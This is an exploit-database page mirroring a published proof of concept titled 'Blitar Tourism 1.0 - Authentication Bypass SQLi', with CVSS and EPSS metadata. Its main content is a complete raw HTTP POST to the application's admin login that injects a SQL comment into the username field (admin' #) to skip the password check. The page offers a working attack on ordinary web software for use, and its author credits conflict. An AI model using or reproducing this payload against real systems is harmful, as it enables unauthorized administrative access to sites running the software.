Advertisement






Blitar Tourism 1.0 - Authentication Bypass SQLi

CVE Category Price Severity
N/A CWE-287 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-04-18
CPE
cpe:Unknown
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 0.3424 0.98913

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021040104

Below is a copy:

Blitar Tourism 1.0 - Authentication Bypass SQLi
|===========================================================================
| # Exploit Title : Blitar Tourism 1.0 - Authentication Bypass SQLi
|                                                                           
| # Author : Ali Seddigh                                                    
|                                                                           
| # Category : Web Application
|
| # Software Link: https://codeload.github.com/satndy/Aplikasi-Biro-Travel/zip/master
|
| # Vendor Homepage: https://sourcecodeaplikasi.info/source-code-aplikasi-biro-travel-berbasis-web/                                                                                                                                                                                                                                                                                   
|                                                                           
| # Tested on : [ Windows ~> 10 , Kali Linux]                                                     
|
| # Version: 1.0
|                  
| # Date : 2021-04-17                                                       
|===========================================================================
 POC : 

POST /travel/Admin/ HTTP/1.1
Host: 192.168.186.132
Content-Length: 49
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.186.132
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.186.132/travel/Admin/
Accept-Encoding: gzip, deflate
Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=0nr18qfifjk2f5o4kimk5ca312
Connection: close

username=admin%27+%23&password=admin&Login=Log+in

|===========================================================================
| # Discovered By : Ali Triplex                                             
|===========================================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.